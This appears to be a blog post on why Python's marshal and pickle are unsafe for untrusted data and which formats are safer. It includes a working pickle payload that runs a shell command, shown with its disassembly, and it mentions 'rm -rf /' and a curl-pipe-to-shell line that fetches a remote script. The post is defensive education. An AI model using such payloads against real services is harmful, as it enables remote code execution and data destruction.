There are no known ways to exploit
marshal. Actually executing code when
marshal.loads() is not something I was able to do, and looking at the
marhal.c source code, I don't see an immediately obvious way.
So why is this warning here? The BDFL explains:
BTW the warning for marshal is legit -- the C code that unpacks marshal data
has not been carefully analyzed against buffer overflows and so on. Remember
the first time someone broke into a system through a malicious JPEG? The same
could happen with marshal. Seriously.
I recommend you read the rest of the discussion; a bug is shown where
unmarshaling data causes Python to segfault; this has been fixed since Python
2.5 (this bug could, potentially, be abused to execute code). Other bugs may
still exist, though!
marshal docs mention:
This is not a general “persistence” module. [..] The marshal module exists
mainly to support reading and writing the “pseudo-compiled” code for Python
modules of .pyc files.
So it's not even designed to persist data in a reliable way.
You can easily execute arbitrary code with
pickle. For example:
>>> import pickle
>>> pickle.loads(b"cos\nsystem\n(S'ls /'\ntR.")
bin data download home lib64 mnt proc run srv tmp usr var
boot dev etc lib lost+found opt root sbin sys ubuntu vagrant
This was a harmless
ls /, but could also be a less harmless
rm -rf /, or a
curl http://example.com/hack.sh | sh.
You can see how this works by using the
>>> import pickletools
>>> pickletools.dis(b"cos\nsystem\n(S'ls /'\ntR.")
0: c GLOBAL 'os system'
11: ( MARK
12: S STRING 'ls /'
20: t TUPLE (MARK at 11)
21: R REDUCE
22: . STOP
pickle.py has some comments on what these opcodes mean:
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
MARK = b'(' # push special markobject on stack
STRING = b'S' # push string; NL-terminated string argument
TUPLE = b't' # build tuple from topmost stack items
REDUCE = b'R' # apply callable to argtuple, both on stack
STOP = b'.' # every pickle ends with STOP
Most of it is self-explanatory; with
GLOBAL you can get any function, and
REDUCE you call it.
Since Python is pretty dynamic, you can also use this to monkey-patch a program
in run-time. For example, you could change the
check_password function with
one where you upload the password to a server.
So what is secure?
XML, json, MessagePack, ini files, or perhaps something else. It depends on
which format is the best in your situation.
Has this code been "carefully analyzed against buffer overflows and so on"? Who
knows. Most code hasn't, and C makes it easy to do things wrong.1 Even Python
code may be vulnerable, as it may call functions implemented in C that are
There have been problems with Python's JSON module. But at the same
time, it's used a lot in public-facing apps, so it's probably safe. It'll
certainly be safer than
marshal, since this was only designed for
and explicitly comes with a "not audited!" warning.
This is of course no guarantee. Remember that YAML security hole a few years back
that caused every Ruby on Rails application in the world to be vulnerable to
arbitrary code execution. Oops! And this wasn't even a subtle buffer
overflow, but a much more obvious problem.
Note that you should not use yaml's
load() method, as this has the
same problems as Ruby's YAML. Use
The warning in the
pickle module is very much warranted (it should probably be
stated stronger), while the warning above the
marshal module seems to be more
of a "this code was not designed with security in mind"-type of warning, but
actually exploiting it is not as easy, and relies on the hypothetical existence
on unknown bugs. Still, you're probably better off using something else.
1 There really ought to be a "carefully analyzed against buffer overflows and so on" seal of trust for open source projects. Yeah, you can shelf out the big bucks and get your code analyzed by Veracode and such, but this is not feasible for open source projects. There is some effort to do this after the OpenSSL Heartbleed clusterfuck a few years ago in the form of the Core Infrastructure Initiative, but its scope and budget are fairly limited (but it's fairly young, and may gain traction in a few years).